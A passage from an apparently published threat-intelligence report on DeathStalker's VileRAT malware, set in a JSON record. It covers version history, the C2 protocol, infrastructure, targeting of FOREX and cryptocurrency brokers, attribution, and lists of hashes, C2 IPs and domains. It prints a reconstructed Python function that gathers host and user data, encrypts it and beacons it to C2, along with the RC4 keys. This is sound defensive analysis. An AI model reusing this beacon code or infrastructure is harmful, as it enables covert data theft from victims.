versions 2.4 and 2.7, VileRAT dropped the capability to use a remote SSH server as a C2 channel, as well as\r\nthe screenshot implementation;\r\nIn version 3.0, the base64-encoded RC4 key which is used for various encryption routines changed from\r\n“Ixada4bxU3G0AgjcX+s0AYndBs4wiviTVIAwDiiEPPA=” to\r\n“XMpPrh70/0YsN3aPc4Q4VmopzKMGvhzlG4f6vk4LKkI=”, and an additional XOR pass (of Type B) was added in\r\nencoding schemes. The VileRAT remote update mechanism was refactored, and an additional command switch\r\n(called pmode) was added;\r\nIn version 3.7, specific Chrome version and Trezor wallet reconnaissance functions that we initially identified for\r\nversion 2.4 were removed from the code, and VileRAT lost the ability to update from files provided on the filesystem\r\nwhere it was running;\r\nIn version 5.4, the way UUID-type identifiers were generated changed;\r\nIn version 6.5, an additional command switch (called jmode) was added;\r\nIn version 6.6, “-f” and “-t” command options were enabled by default.\r\nVileRAT HTTP C2 protocol\r\nVileRAT’s main C2 communication loop, as executed during Main C2 client mode (as described in VileRAT functionalities\r\nabove), is quite straightforward and runs in a separate thread:\r\nEvery 2-5 minutes, VileRAT tries to send an HTTP POST request to each of the C2 servers that exist in its\r\nconfiguration, until one replies or until the list is exhausted. Environment data is embedded in a JSON dictionary,\r\nwhich is encrypted using RC4, encoded using the Type B XOR algorithm, base64-encoded and URL-encoded, then\r\nfinally set as the HTTP request URL path (see Figure 14);\r\nA C2 server may reply with an HTTP response, whose body can include an encoded and encrypted JSON array. If so,\r\nthe JSON must contain at least a command to execute.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\ndef get_request_data(req_type, xmode, pmode):\r\n    data = {\r\n        'type': 'svc',\r\n        'xmode': xmode,\r\n        'pmode': pmode,\r\n        'req_type': req_type,\r\n        'svc_ver': conf.VERSION,\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 12 of 23\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n        'svc_name': conf.SVC_NAME,\r\n        'ext_uuid': get_ext_uuid(),\r\n        'svc_uuid': get_service_uuid(),\r\n        'old_svc_uuid': get_old_service_uuid(),\r\n        'host': get_hostname(),\r\n        'uname': get_username(),\r\n        'ia': win32.hap(),\r\n        'wv': win32.gwv(),\r\n        'dt': datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S'),\r\n        'xn': os.path.basename(sys.executable)\r\n    }\r\n    if req_type == REQ_GET_CMD:\r\n        data['gc'] = global_conf\r\n        data['klr'] = keylogger.kl_run\r\n        data['cr'] = win32.is_process_exist(exe_name='chrome.exe')\r\n        data['avs'] = get_av_list()\r\n    elif req_type in [REQ_FIRST_RUN, REQ_INSTALL_DONE]:\r\n        data['avs'] = get_av_list()\r\n    enc_data = quote(b64encode(encrypt_xor(rc4_encrypt(json.dumps(data).encode('utf-8')))), safe=\"~()*!.'\")\r\n    return enc_data\r\nFigure 14. VileRAT C2 request preparation function\r\nJust as in VileLoader, the User-Agent value in HTTP requests is randomly selected from a fixed list of possible values. The\r\nJSON that is passed to the C2 server can be broken down as follows:\r\nJSON Key Value\r\ntype Fixed value set to “svc”.\r\nxmode True if VileRAT is executed with the xmode command line switch; false otherwise.\r\npmode True if VileRAT is executed with the pmode command line switch; false otherwise.\r\nreq_type\r\nInternal C2 command request type, value can be get_cmd, update_done, screenshot, first_run,\r\ninstall_done or klgr.\r\nsvc_ver Internal VileRAT version number as set in VileRAT’s configuration.\r\nsvc_name Internal VileRAT implant name as set in VileRAT’s configuration.\r\next_uuid\r\nPartial value of one of the mutexes VileRAT sets to ensure atomic execution. It can either be the same\r\nsystem UUID as the one collected by VileDropper as part of the target identifier generation, or a hard-coded one.\r\nsvc_uuid The target identifier, generated again with the same algorithm used in VileDropper.\r\nold_svc_uuid\r\nA hard-coded value, or the same system UUID as the one collected by VileDropper as part of the target\r\nidentifier generation, but represented using a different (and presumably older) custom algorithm.\r\nhost Hostname of the target machine.\r\nuname Username of the target.\r\nia 1 if the user running VileRAT has administrator privileges; 0 otherwise.\r\nwv Windows version, formatted as dwMajorVersion.dwMinorVersion (eg. 10.0).\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 13 of 23\n\ndt Timestamp of the HTTP request, formatted as YYYY-MM-DD HH-MM-SS.\r\nxn VileRAT’s filename.\r\navs\r\nJSON list of installed security products names (e.g., [“windows defender”, “kaspersky internet\r\nsecurity”]), as retrieved from WMI by VileRAT.\r\nThe C2 answer is expected as an encoded and encrypted JSON list (leveraging the same coding and cryptographic methods\r\nas for the JSON in the HTTP request). Each item in the list must be a JSON dictionary that contains at least a “cmd” key. Its\r\nvalue can be one of: update_svc, ssh_rshell, r_cmd, ssh_rdyn or update_conf. Additional JSON key/value pairs can exist in\r\nthe dictionary and are passed to internal commands as parameters.\r\nA few words about VileRAT’s infrastructure\r\nWe looked for specificities in the C2 domains we could retrieve from the samples gathered (either malicious DOCX files,\r\nDOTM files and their macros, VileDropper, VileLoader or VileRAT) and that are described in this report. We ignored\r\ndomains registered before mid-October 2021 because most of them were already disclosed in public sources (all known\r\nmalicious domains and IPs are listed in full in the indicators of compromise section below). It should be noted that to date,\r\nwe have identified hundreds of domains associated with VileRAT’s infection chain.\r\nThis allowed us to identify some likely VileRAT-specific infrastructure creation preferences:\r\nStarting from October 2021 at the latest, DeathStalker infrastructure IPs all belong to AS42159 (DELTAHOST UA,\r\nlocated in NL). According to our telemetry, DeathStalker likely started to leverage servers with IP addresses from this\r\nAS (along with others) as early as June 2021;\r\nMalicious domain names are often batch-registered (several domains on the same day) at NAMECHEAP, Porkbun\r\nLLC or PDR Ltd.;\r\nA lot of malicious domain names try to masquerade as seemingly legitimate digital services providers names (such as\r\n“azcloudazure[.]com” or “amzbooks[.]org”), and some denote a possible attempt to leverage events of worldwide\r\ninterest to conduct attack campaigns (such as “weareukrainepeople[.]com” or “covidsrc[.]com”);\r\nDomain usage seems to be separated most of the time (one domain is used only for either infection DOCX/DOTM,\r\nVileLoader or VileRAT), and might indicate a desire by the threat actor to tightly cluster its operations. But all those\r\ndomains usually point to a very limited set of IP addresses;\r\nA quick analysis of the characteristics of the services exposed on C2 IPs during malicious activities allowed us to\r\nnote common signatures: the HTTP service sends a combination of content and header values that could only be\r\nretrieved for such malicious infrastructure.\r\nVileRAT’s targets\r\nFrom August 2021 to the present day, using only data that we could check with our own telemetry, we identified 10\r\ncompromised or targeted organizations in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the United Arab\r\nEmirates and the Russian Federation (see Figure 15).\r\nFigure 15. Map of organizations targeted by DeathStalker’s VileRAT campaign (darker color indicates a higher\r\nconcentration)\r\nWe could not profile all the identified organizations, but half of them were foreign currency (FOREX) and cryptocurrency\r\nexchange brokers. Some identified malicious documents and infrastructure domains contain (parts of) the targeted\r\norganizations’ names, and confirm this targeting.\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 14 of 23\n\nIt should be noted that the identified organizations range from recent startups to established industry leaders, including\r\ndubious cryptocurrency exchange platforms. Locating such organizations is extremely difficult from the limited data we\r\nhave at hand, because a small FOREX company might, for instance, host its infrastructure in various foreign countries,\r\nemploy several remote workers from different countries, and be legally based in a tax haven.\r\nAttribution\r\nWhen we first discovered VileRAT in June 2020, we initially attributed the implant and associated infection chain to\r\nDeathStalker. This first attribution was mainly based on similarities with previously known EVILNUM campaigns (common\r\nspecific metadata in LNK files, similar TTPs – notably the spear-phishing approach leveraging Google Drive files and fake\r\npersonas, consistent victimology). The tie between EVILNUM campaigns and DeathStalker has already been demonstrated\r\nin our previous article.\r\nWe still believe with high confidence that the described updated implants and associated infection chain are developed and\r\noperated by DeathStalker:\r\nThe main implants (VileLoader, VileRAT) that are leveraged for this campaign are updates of previously analyzed\r\nones, and still share a large majority of code and implementation specifics with previous samples;\r\nThe various components of the described infection chain (DOCX, macro-enabled DOTM, VileDropper) share\r\nimplementation logic and techniques that have previously been leveraged by DeathStalker as part of other campaigns\r\n(PowerSing and PowerPepper notably):\r\nUsing malicious documents (fetched from emails) as an infection vector;\r\nSignaling infection progress and errors to remote servers;\r\nUsing a similarly implemented XOR algorithm for string obfuscation (in DOTM macros, and in previously\r\ndocumented PowerPepper loaders);\r\nLeveraging Office object properties as hidden data sources;\r\nUsing similarly implemented hash-like functions with a preset constant (to generate a target identifier in\r\nVileDropper, to decode an IP address in PowerSing).\r\nConclusion\r\nVileRAT, its loader and associated infection chain were continuously and frequently updated for more than two years, and\r\nare still leveraged to persistently target foreign currency and cryptocurrency exchange brokers, with a clear intent to escape\r\ndetection.\r\nEscaping detection has always been a goal for DeathStalker, for as long as we’ve tracked the threat actor. But the VileRAT\r\ncampaign took this desire to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign\r\nwe have ever identified from this actor. From state-of-the-art obfuscation with VBA and JS, to multi-layered and low-level\r\npacking with Python, a robust multi-stage in-memory PE loader, and security vendor-specific heuristic bypasses, nothing has\r\nbeen left to chance.\r\nConsidering the vast and quickly changing associated infrastructure as well, there is no doubt DeathStalker is making a\r\ntremendous effort to develop and maintain accesses. Yet, there are some glitches and inconsistencies: a final payload\r\nweighing more than 10MB (VileRAT), simple infection vectors, lots of suspicious communication patterns, noisy and easily\r\nidentified process executions or file deployments, as well as sketchy development practices leaving bugs and requiring\r\nfrequent implant updates. As a result, an efficient and properly setup endpoint protection solution will still be able to detect\r\nand block most of VileRAT’s related malicious activities.\r\nPutting these facts into perspective, we believe DeathStalker’s tactics and practices are nonetheless sufficient (and have\r\nproven to be) to act on soft targets who may not be experienced enough to withstand such a level of determination, who may\r\nnot have made security one of their organization’s top priorities, or who frequently interact with third parties that did not do\r\nso. We still, however, cannot determine what DeathStalker’s principal intention against such targets is: it could range from\r\ndue diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding its customers in\r\nworking around sanctions and/or spying on the targets’ customers, but it still does not appear to be direct financial gain.\r\nIndicators of compromise\r\nInfection DOCX MD5 hashes\r\n09FB41E909A0BCA1AB4E08CB15180E7C\r\n0B4F0EAD0482582F7A98362DBF18C219\r\n0CB7936975F74EA2C4FA476A6E3D5A05\r\n15C62D22495CA5AA4BB996B2CB5FEB7F\r\n1AAFBE60E4D00A3BFFDB76FA43C2ADBB\r\n237831757F629BA61C202B51E0026C9B\r\n238CD8435ADFFDAEBBF9D7489764648A\r\n241AD2BB7E703343F477960B39A8B300\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 15 of 23\n\n257754E9CD6EEC6DB5323E282FB16A74\r\n2BAADB95EF832CF5EB550121FA0292D0\r\n2C6314821C64F235E862B38DADEE535E\r\n2F8817B75D81C2F029FA70DE69B4A94B\r\n3C4F409A7926731254B44CA6526DCED1\r\n3C9A5A69CC928A39519178DA2A8EFFB6\r\n5BE87EC5A2F48483317A57CE120ACC0E\r\n609F595053D481C047D9C9B8C0F6B39C\r\n63090A9D67CE9534126CFA70716D735F\r\n77612466654702C7ED7C6B1C21CFAEFE\r\n77B4AF2734782DC7FC10A6FD7978AE80\r\n79157A3117B8D64571F60FE62C19BF17\r\n7C7D4DFAC6A2628B9921405F25188FE3\r\n8746077795FF9C33A591C7E261B7C7B8\r\n9352DBA6CC8AC67F22E62D7A1B5E51B6\r\n9895D0C19AC482F62C53AD8399F98B66\r\nA4B79DA85C6EE26D0EBEA444A60DB900\r\nA7FB4779F2A1C4A27DA2E74616DB7C31\r\nB09A35B75700D11A251BDFC51B1D08E9\r\nC212AF0C8A880697374E06B59376F991\r\nC59EB65B0B237E39AFED796C5B3DB417\r\nC75FC659F257291C9CCC94C3FF4B5A83\r\nC818E4BCA286C690156EFF37DAA2E209\r\nC86F8642560A6353ED2FE44F0C6B07E8\r\nD72B649DF88D78441D5629AF99FA1D40\r\nE0D474AF77E89BF1C2DBB7D7A5F8ACE9\r\nE28F2F0546EF07BC3425528D813EC954\r\nE375B63A76DADDFF5741B340AE7BD6A8\r\nE51CBCF89A26686C62350BAE371F8601\r\nE726520B3AD875B516DF6C3D25476444\r\nF0D3CFF26B419AFF4ACFEDE637F6D3A2\r\nFB75DDE8F9E473D019A6CBDBB0D2283A\r\nFF2558571EE99ED4AEC63A3980719034\r\nMacro-enabled DOTM remote templates MD5 hashes\r\n02C1EC61C4E740AF85B818A89E77E2C2\r\n75A3F8D143CF96C163106E21272FF170\r\n7FCC03D062AC8AA2BE8D7600B68FC53A\r\n82D841D7712AB0EE9F1BBB6B3D22821A\r\n93CE42F23B0800F257D355C0B10C8D79\r\nE6F9D538FCDF46493DF8ECB648F98D13\r\nVileDropper JavaScript MD5 hashes\r\n3C8052862B194F205AC5138BF07ADFBE\r\n43A2B45D25BB898DBBCB2EE36C909D64\r\n6E201A9BB9945BDC816A7A9C2DCF73B9\r\n7822FF3D5008E0B870BB03EF8D2032DC\r\n99F762D23451B9ABABA95BCE3F544FDB\r\nC97B0753A263E042EB6E3C72B2F6565F\r\nCABAF29E9763D18B0D0DFFBC576FDF3E\r\nVileLoader (stage 1 binary) MD5 hashes\r\n0456FA74B8CC6866C5D1CE9E15136723\r\n0BD06D2C17987C7B0C167F99BB4DC0B4\r\n0F3685A6ACA7991C209D41D0E2279861\r\n107A084A1C8A6E9E5B3BEF826C3443DC\r\n15A192BB683BD47956CC91B2CFCE3052\r\n161FE654DDED7AE74EE40F1854B9F81E\r\n174CF10F0F320B281B3FFBF782771AD7\r\n22DDB087EF3310B3F724544F74E28966\r\n237BAB121E846DCFA492E7CC5966EAD9\r\n2503B8AABEEB2649915126573307B648\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 16 of 23\n\n29EF001568851845B84F3CD163BFD439\r\n2A5ECA9B83A999E86054E53330F68F5B\r\n2DBEA08AFE245F246B500727B7D27761\r\n2FC7211C94B7C89968ACFAD8C084EE3B\r\n2FDDDA0DC33D3F8BAB906C43982AA4A2\r\n30CA78A99F49782942835B1C10E2834A\r\n33F1303842BDDC98205984E6ACF782F7\r\n344A41ECF89B5642B6FE0A695852AA1B\r\n36E60C00A64BAA014CF7A44CB9C9F410\r\n3C960DCC782A4D9552F0CC96451633C8\r\n3D127901AFD64EACE4C7B939FDBA90BB\r\n3E0A49646B9D5D0C63036692BA1C7315\r\n3FC5AB8A3EAB1D8CFF8530BBE2BAE608\r\n524909CB66848B1EE2987FDC0B69B451\r\n52B208E86C0DDE252200953A4EB71EA3\r\n52C1E4537424E151469E8E67DF07EFE6\r\n577497F9E9D4EA6070AA250B355DCFB1\r\n578E16856061F6CB760B06B1735F9143\r\n5BA950833DC55FE30F1E24CBCF1DEA3C\r\n5D9DB5350E1CA2D9DACBA75F4AA80AE0\r\n6677B435A7455579BC063BD9F7CBE65E\r\n6A1672401FFD7FB64DFE09A7A464067C\r\n6AED3D8D53CB4B90FF0EDA8803C7F1F5\r\n6E056456B2F40D2C47219C6DB24D9541\r\n700B71690C7902DEC10275A6AE320ADF\r\n77AC6332A5A4DE5712B66949AC8BF582\r\n7B478EDC2B74D7ECDC6B1D9532C9E7F8\r\n80A84624126B6D72FF5D1B25B80204C2\r\n82118066CF5EE34E7956F8D288B725E6\r\n85C09C35F85EDD1428208CD240A72BD8\r\n8B4905B5D0142EBD67B103E2CDD047E3\r\n8C377D184D88991388B7D0ED6CFB4A98\r\n8C4975EDB8C6BE37C416D9B6483E9BD5\r\n942D540F7608752233800AEB66BC8DC7\r\n977D5BABF7112F1B6072EAA1F3F896B8\r\n991CA8ECD3F4A70892CFF4FB774AF22B\r\nA82C6772F984A9B49A1512B913DA4332\r\nAB4B8D26D389C76B3D4A85E2CCB9E153\r\nB68915810F6DE276A706E7F4C37645EA\r\nB6EE9DAEA4B2D849793E651603A1512D\r\nBC162B6742AA1EA86A3B391D549EF969\r\nC21025561A3151F9EB2C728AAB5A7A90\r\nC3828CE2ED1453EFAAD442D150B79F6E\r\nC89D5BB8A36C0F2891B5A75834A7AD64\r\nCF8988662588C8FE943ECF42FC35E0B4\r\nD3E95C81D038CBF6EFC5AF3208313922\r\nDB1A697955F1140AED36864617F41425\r\nDB2179161FA0FC1694BD7425D1E80A5D\r\nDB6800CF6288BA0B7492F533F519CA24\r\nDC6F128A5316FB9AF66EA01190C63895\r\nE18078DCA1A1F452B06EC0D9C30982B6\r\nE3F106AF3E45C480BF9E45EB21617083\r\nE833910AB506B08DB2A0E7E1313C6556\r\nEA71FCC615025214B2893610CFAB19E9\r\nF02B13F9634604BE5388B3C13C7CEC8D\r\nF18D216B070744097846F96877865D1C\r\nF5884141B04503EE6AFB2A17FD7761FC\r\nF93FEE328737CB97D83701A4A50EAEFD\r\nFC5F0CC23280547E1D727534649B3DFA\r\nFFE01DCCC1AA70C80EBB1B9F8FCADF1F\r\nVileRAT (standalone) MD5 hashes\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 17 of 23\n\n348C99A209616FC674FCABCAFDDBA4A0\r\n99B54991FCE2C6D17CDEF7BBD60FDA27\r\nB0353610172416A9FFCD3E7FB7BAE648\r\nEC04E0D3EADF043A1219942051A2A147\r\nBB2113989478DB0AE1DFBF6450079252\r\n15BAF177FC6230CE2FCB483B052EB539\r\nBAB0B5BB50C349CEFD9DEDF869EB0013\r\nD3947C239A07090DEB7D4A9D21D68813\r\nB4183E52FB807689140ED5AA20808700\r\nA7B300D6CB0488358A80C512A64FF570\r\n8F20155F0D9541F7CB5C3BBDC402498B\r\n6D0B710057C82E7CCD59A125599C8753\r\n14D9D03CBB892BBBF9939EE8FFFDD2B5\r\nA62850FD3D7DEC757043AB33417E7A13\r\n03205E90135FD84D74AF8B38D1960994\r\nACCC6633AF50AEA83024AB5A0861375B\r\nE1956B827EF36A0DDE5C42F2C26AC8B6\r\nDBD9CBAEB27326EF2AEAD32292D70632\r\n8F9D01DC7D1EB9AB388BF94F0B926E3B\r\n6E79535F38248C7769365881C577DF29\r\nC2 IP addresses\r\n185.161.208[.]172 2022-07, and 2021-06 to 07 at least\r\n185.161.208[.]207 2022-07 at least\r\n185.161.209[.]87 2022-06 at least\r\n185.161.208[.]209 2022-05 to 06 at least\r\n185.161.208[.]20 2022-04 to 06 at least\r\n185.161.208[.]225 2022-03 to 04 at least\r\n185.236.76[.]230 2022-03 to 04 at least\r\n185.236.76[.]30 2022-03 at least\r\n185.236.76[.]34 2022-03 at least\r\n185.161.209[.]223 2022-01 to 02 at least\r\n185.161.209[.]28 2022-01 to 02 at least\r\n185.161.208[.]166 2021-12 to 2022-01 at least\r\n185.161.208[.]182 2021-12 at least\r\n185.161.209[.]97 2021-11 and 08 at least\r\n185.236.76[.]21 2021-11 at least\r\n185.161.209[.]117 2021-10 at least\r\n185.161.208[.]64 2021-10 at least\r\n185.161.208[.]194 2021-09 to 10 at least\r\n185.161.209[.]170 2021-09 at least\r\n185.161.208[.]160 2021-07 to 09 at least\r\n193.56.28[.]201 2020-07 at least\r\n185.236.230[.]25 2020-07 at least\r\nC2 domain names\r\nNote: the C2 domain names have been identified in our own telemetry or extracted from malicious files that are described in\r\nthis article and that we analyzed. The domains may still have previously (or later) been used for legitimate purposes as\r\ndomains may get reused over time. Even if we could not notice such a conflict up to now, the resolution of a hostname that\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 18 of 23\n\nbelongs to such domain must better be checked to match previously listed C2 IP addresses, before concluding it is indicative\r\nof a compromise.\r\nrowfus[.]com\r\nshopadvs[.]com\r\nsvclouds[.]com\r\ncorstand[.]com\r\ngetappcloud[.]com\r\nhostboxapp[.]com\r\nweareukrainepeople[.]com\r\neroeurovc[.]com\r\nflightpassist[.]com\r\nihotel-deals[.]com\r\nmevcsft[.]com\r\nmsfsvctassist[.]com\r\npinktwinlers[.]com\r\nplantgrn[.]com\r\nwazalpne[.]com\r\naffijay[.]com\r\nupservicemc[.]com\r\nmsfbckupsc[.]com\r\nestimefm[.]org\r\nvisitaustriaislands[.]com\r\nbookaustriavisit[.]com\r\nhubflash[.]co\r\nbookingitnow[.]org\r\nplanetjib[.]com\r\nenigmadah[.]com\r\nqeliabhat[.]com\r\nqnmarry[.]com\r\npngdoma[.]com\r\nrobmkg[.]com\r\ntextmaticz[.]com\r\ngoalrom[.]com\r\ndeltacldll[.]com\r\nnortonalytics[.]com\r\nudporm[.]com\r\ndellscanhw[.]com\r\nmailcloudservices[.]org\r\nhpcloudlive[.]com\r\nwindowslive-detect[.]com\r\nzummaride[.]com\r\ncashcores[.]org\r\nthesailormaid[.]com\r\nmultizoom[.]org\r\npoccodom[.]com\r\nmsftmnvm[.]com\r\nplancetron[.]com\r\ncovidsrc[.]com\r\ncovidsvcrc[.]com\r\nmsftcd[.]com\r\nrombaic[.]com\r\ncargoargs[.]com\r\namazoncld[.]com\r\nprintauthors[.]com\r\namznapis[.]com\r\nthismads[.]com\r\nammaze[.]org\r\neroclasp[.]com\r\nmullticon[.]com\r\naudio-azure[.]com\r\nazure-affiliate[.]com\r\nservice-azure[.]com\r\nscan-eset[.]com\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 19 of 23\n\ncheck-avg[.]com\r\nadsmachineio[.]com\r\napi-pixtools[.]com\r\napi-printer-spool[.]com\r\ndriver-wds[.]com\r\nflowerads[.]cloud\r\nglobaladdressbook[.]cloud\r\nmsft-cdn[.]cloud\r\nwindows-accs[.]live\r\nwindows-ddnl[.]com\r\nfreepbxs[.]com\r\ntrvol[.]com\r\ntrvolume[.]net\r\ncorpxtech[.]com\r\nveritechx[.]com\r\nvvxtech[.]net\r\nextrasectr[.]com\r\ntrquotesys[.]com\r\nquotingtrx[.]com\r\nbooknerfix[.]com\r\nbgamifieder[.]com\r\nbook-advp[.]com\r\nnetwebsoc[.]com\r\nrefinance-ltd[.]com\r\nwindnetap[.]com\r\nn90app[.]com\r\nappdllsvc[.]com\r\nmeetomoves[.]com\r\nmoretraveladv[.]com\r\nhostedl[.]com\r\nagagian[.]com\r\ninformaxima[.]org\r\npolanicia[.]com\r\nam-reader[.]com\r\nliongracem[.]com\r\njmarrycs[.]com\r\nworldchangeos[.]com\r\ngvgnci[.]com\r\nananoka[.]com\r\nnetpixelds[.]com\r\nallmyad[.]com\r\nwicommerece[.]com\r\nshowsvc[.]com\r\nborisjns[.]com\r\ngovdefi[.]com\r\ndogeofcoin[.]com\r\nrealshbe[.]com\r\nquestofma[.]com\r\ncovidgov[.]org\r\ngovtoffice[.]org\r\ncovidaff[.]org\r\ncovsafezone[.]com\r\nmsftinfo[.]com\r\ninvgov[.]org\r\nanypicsave[.]com\r\nnavyedu[.]org\r\nanyfoodappz[.]com\r\ncloudazureservices[.]com\r\ndnserviceapp[.]com\r\npicodehub[.]com\r\nmusthavethisapp[.]com\r\nrefsurface[.]com\r\namazoncontent[.]org\r\nwizdomofdo[.]com\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 20 of 23\n\ntomandos[.]com\r\namazonappservice[.]com\r\namzncldn[.]com\r\nazurecontents[.]com\r\nphilipfin[.]com\r\ncloudhckpoint[.]com\r\ncheckpoint-ds[.]com\r\niteamates[.]com\r\nglobal-imsec[.]com\r\nprintfiledn[.]com\r\nmsftprintsvc[.]com\r\nworldsiclock[.]com\r\ndeuoffice[.]org\r\namazonpmnt[.]com\r\nalipayglobal[.]org\r\ncloudamazonft[.]com\r\napple-sdk[.]com\r\nazurecfd[.]com\r\napiygate[.]com\r\nmsftcrs[.]com\r\nsysconfwmi[.]com\r\ndnstotal[.]org\r\nnamereslv[.]org\r\nmailservicenow[.]com\r\ncloudreg-email[.]com\r\napidevops[.]org\r\nzerobitfan[.]com\r\nedwardpof[.]com\r\nmainsingular[.]com\r\ntotaledgency[.]com\r\nadmex[.]org\r\noutlookfnd[.]com\r\nbookfinder-ltd[.]com\r\nearthviehuge[.]com\r\nestoniaforall[.]com\r\njarviservice[.]org\r\nmoreofestonia[.]com\r\ntraveladvnow[.]com\r\ntripadvit[.]com\r\nadvideoc[.]org\r\nauzebook[.]com\r\nmslogger[.]org\r\nnetmsvc[.]com\r\nntlmsvc[.]com\r\nprodeload[.]com\r\nrealmacblog[.]com\r\nroblexmeet[.]com\r\nweatherlocate[.]com\r\ncrm-domain[.]net\r\nleads-management[.]net\r\nvoipasst[.]com\r\nvoipreq12[.]com\r\nvoipssupport[.]com\r\ntelefx[.]net\r\nSuspected C2 domain names\r\nNote: the suspected C2 domain names have been identified because they were both registered in a similar way than known\r\nC2 domain names, AND because associated hostnames pointed to known C2 IP addresses during a timeframe of known\r\nmalicious activity. While we believe with medium to high confidence the vast majority of these domains have been or could\r\nbe leveraged by DeathStalker, it is still possible that a few of them never support malicious activities.\r\nadsoftpic[.]com\r\nazcloudazure[.]com\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 21 of 23\n\nazureservicesapi[.]com\r\ndiamondncenter[.]biz\r\nforceground[.]co\r\nmultitrolli[.]com\r\nsearchvpics[.]com\r\nsuperimarkets[.]com\r\nsymantecq[.]com\r\nyorkccity[.]com\r\ncosmoscld[.]com\r\noglmart[.]com\r\nshopamzn[.]org\r\naidobe-update[.]com\r\namzn-services[.]com\r\napplecloudnz[.]com\r\nesetupdater[.]com\r\nfastnetbrowsing[.]com\r\nfindmypcs[.]com\r\nflyingpackagetrack[.]com\r\nmcafee-secd[.]com\r\nmsfastbrowse[.]com\r\nmurfyslaws[.]com\r\nnetworkcanner[.]com\r\nnvidiaupdater[.]com\r\noauth-azure[.]com\r\noautho[.]com\r\norbiz[.]me\r\noutlooksyn[.]com\r\npdfscan-now[.]com\r\nsoundstuner[.]com\r\ntimetwork[.]com\r\nwingsnsun[.]com\r\nazuredllservices[.]com\r\nmailgunltd[.]com\r\nofficelivecloud[.]com\r\nkgcharles[.]com\r\nmstreamvc[.]com\r\nstreamsrvc[.]com\r\nwalltoncse[.]org\r\nwldbooks[.]com\r\ntravelbooknow[.]org\r\namzbooks[.]org\r\natomarket[.]org\r\nelitefocuc[.]com\r\nfutureggs[.]com\r\nnewedgeso[.]com\r\ntopotato[.]org\r\nwwcsport[.]org\r\nfiredomez[.]com\r\ngratedomofrome[.]com\r\nservicebu[.]org\r\nservicejap[.]com\r\nappcellor[.]com\r\ncloud-appint[.]com\r\ncoreadvc[.]com\r\nsellcoread[.]com\r\nallrivercenter[.]com\r\nmissft[.]com\r\nonesportinc[.]com\r\ntophubbyriver[.]com\r\nyourprintllc[.]com\r\nazuredcloud[.]com\r\nbingapianalytics[.]com\r\nmscloudin[.]com\r\nmsdllopt[.]com\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 22 of 23\n\nnetrcmapi[.]com\r\npcamanalytics[.]com\r\ndbcallog[.]com\r\nmsft-dev[.]com\r\nmsftapp[.]com\r\nmsftprint[.]com\r\nmsintsvc[.]com\r\npraxpay[.]org\r\nprint-hpcloud[.]com\r\nsvcscom[.]com\r\nunitedubai[.]org\r\nunitepixel[.]org\r\nadvflat[.]com\r\ncloudappcer[.]com\r\ncloudpdom[.]com\r\ndustforms[.]com\r\neconfuss[.]com\r\nezteching[.]com\r\ninfntio[.]com\r\nluccares[.]com\r\norklaus[.]com\r\nroboecloud[.]com\r\nwdigitalecloud[.]com\r\nadvertbart[.]com\r\nbunflun[.]com\r\ncovdd[.]org\r\ninetp-service[.]com\r\ninfcloudnet[.]com\r\nkhnga[.]com\r\nmailservice-ns[.]com\r\nwebinfors[.]com\r\nyomangaw[.]com\r\nazueracademy[.]com\r\ncyphschool[.]com\r\nimagegyne[.]com\r\nimageztun[.]com\r\nnetoode[.]com\r\nolymacademy[.]com\r\npivotnet[.]org\r\nfxmt4x[.]com\r\ntelecomwl[.]com\r\nxlmfx[.]com\r\n[1]\r\n This is an expected result from the standard CPython build chain: the build configuration will automatically tag a binary\r\nwith such version naming if compilation is done from sources that do not match a defined tag (for instance, 3.7.4) or are\r\nmodified.\r\n[2]\r\n All JSON dictionaries required by commands are URL-encoded, base64-encoded, and RC4-encrypted with a base64-\r\nencoded RC4 key of “XMpPrh70/0YsN3aPc4Q4VmopzKMGvhzlG4f6vk4LKkI=” (starting from VileRAT 3.0; previous\r\nsamples use a different key).\r\nSource: https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 23 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/"
	],
	"report_names": [
		"107075"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f7aa6029-2b01-4eee-8fe6-287330e087c9",
			"created_at": "2022-10-25T16:07:23.536763Z",
			"updated_at": "2026-04-10T02:00:04.646542Z",
			"deleted_at": null,
			"main_name": "Deceptikons",
			"aliases": [
				"DeathStalker",
				"Deceptikons"
			],
			"source_name": "ETDA:Deceptikons",
			"tools": [
				"EVILNUM",
				"Evilnum",
				"Janicab",
				"PowerPepper",
				"Powersing",
				"VileRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
